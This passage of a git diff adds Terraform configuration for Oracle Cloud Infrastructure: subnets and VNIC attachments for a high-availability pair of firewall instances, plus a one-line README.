+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  vcn_id              = "${oci_core_vcn.vcn.id}"
+  route_table_id      = "${oci_core_route_table.public.id}"
+  security_list_ids   = ["${oci_core_security_list.management.id}"]
+}
+resource "oci_core_subnet" "untrust" {
+  cidr_block          = "${var.untrust_cidr}"
+  display_name        = "untrust"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  vcn_id              = "${oci_core_vcn.vcn.id}"
+  route_table_id      = "${oci_core_route_table.public.id}"
+  security_list_ids   = ["${oci_core_security_list.untrust.id}"]
+}
+resource "oci_core_subnet" "trust" {
+  cidr_block          = "${var.trust_cidr}"
+  display_name        = "trust"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  vcn_id              = "${oci_core_vcn.vcn.id}"
+  security_list_ids   = ["${oci_core_security_list.trust.id}"]
+  prohibit_public_ip_on_vnic   = true
+}
+resource "oci_core_subnet" "ha2" {
+  cidr_block          = "${var.ha2_cidr}"
+  display_name        = "HA2"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  vcn_id              = "${oci_core_vcn.vcn.id}"
+  security_list_ids   = ["${oci_core_security_list.trust.id}"]
+  prohibit_public_ip_on_vnic   = true
+}
+resource "oci_core_subnet" "web" {
+  cidr_block          = "${var.web_cidr}"
+  display_name        = "web"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  vcn_id              = "${oci_core_vcn.vcn.id}"
+  route_table_id      = "${oci_core_route_table.web.id}"
+  security_list_ids   = ["${oci_core_security_list.web.id}"]
+  prohibit_public_ip_on_vnic   = true
+}
\ No newline at end of file
diff --git a/oci/HA/vnics.tf b/oci/HA/vnics.tf
new file mode 100644
index 00000000..cab888d5
--- /dev/null
+++ b/oci/HA/vnics.tf
@@ -0,0 +1,82 @@
+resource "oci_core_vnic_attachment" "firewall1_untrust" {
+  instance_id  = "${oci_core_instance.firewall1.id}"
+  display_name = "firewall1_untrust"
+
+  create_vnic_details {
+    subnet_id               = "${oci_core_subnet.untrust.id}"
+    private_ip              = "${var.fw1_untrust_ip}"
+    display_name            = "untrust"
+    assign_public_ip        = false
+    skip_source_dest_check  = true
+    #nsg_ids                 = ["${oci_core_network_security_group.untrust.id}"]
+  }
+}
+resource "oci_core_vnic_attachment" "firewall1_trust" {
+  instance_id  = "${oci_core_instance.firewall1.id}"
+  display_name = "firewall1_trust"
+
+  create_vnic_details {
+    subnet_id              = "${oci_core_subnet.trust.id}"
+    private_ip              = "${var.fw1_trust_ip}"
+    display_name           = "trust"
+    assign_public_ip       = false
+    skip_source_dest_check = true
+    #nsg_ids                = ["${oci_core_network_security_group.trust.id}"]
+  }
+  depends_on = ["oci_core_vnic_attachment.firewall1_untrust"]
+}
+resource "oci_core_vnic_attachment" "firewall1_ha2" {
+  instance_id  = "${oci_core_instance.firewall1.id}"
+  display_name = "firewall1_ha2"
+
+  create_vnic_details {
+    subnet_id              = "${oci_core_subnet.ha2.id}"
+    private_ip              = "${var.fw1_ha2_ip}"
+    display_name           = "ha2"
+    assign_public_ip       = false
+    skip_source_dest_check = false
+    #nsg_ids                = ["${oci_core_network_security_group.ha.id}"]
+  }
+  depends_on = ["oci_core_vnic_attachment.firewall1_trust"]
+}
+resource "oci_core_vnic_attachment" "firewall2_untrust" {
+  instance_id  = "${oci_core_instance.firewall2.id}"
+  display_name = "firewall2_untrust"
+
+  create_vnic_details {
+    subnet_id              = "${oci_core_subnet.untrust.id}"
+    private_ip              = "${var.fw2_untrust_ip}"
+    display_name           = "untrust"
+    assign_public_ip       = false
+    skip_source_dest_check = true
+    #nsg_ids                = ["${oci_core_network_security_group.untrust.id}"]
+  }
+}
+resource "oci_core_vnic_attachment" "firewall2_trust" {
+  instance_id  = "${oci_core_instance.firewall2.id}"
+  display_name = "firewall2_trust"
+
+  create_vnic_details {
+    subnet_id              = "${oci_core_subnet.trust.id}"
+    private_ip              = "${var.fw2_trust_ip}"
+    display_name           = "trust"
+    assign_public_ip       = false
+    skip_source_dest_check = true
+    #nsg_ids                = ["${oci_core_network_security_group.trust.id}"]
+  }
+  depends_on = ["oci_core_vnic_attachment.firewall2_untrust"]
+}
+resource "oci_core_vnic_attachment" "firewall2_ha2" {
+  instance_id  = "${oci_core_instance.firewall2.id}"
+  display_name = "firewall2_ha2"
+
+  create_vnic_details {
+    subnet_id              = "${oci_core_subnet.ha2.id}"
+    private_ip              = "${var.fw2_ha2_ip}"
+    display_name           = "ha2"
+    assign_public_ip       = false
+    skip_source_dest_check = false
+    #nsg_ids                = ["${oci_core_network_security_group.ha.id}"]
+  }
+  depends_on = ["oci_core_vnic_attachment.firewall2_trust"]
+}
\ No newline at end of file
diff --git a/oci/README.md b/oci/README.md
new file mode 100644
index 00000000..073864b0
--- /dev/null
+++ b/oci/README.md
@@ -0,0 +1 @@
+Terraform for OCI